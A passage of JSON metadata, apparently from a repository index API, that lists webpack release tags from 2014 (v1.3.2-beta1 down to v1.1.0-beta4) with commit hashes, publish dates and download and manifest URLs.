pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_a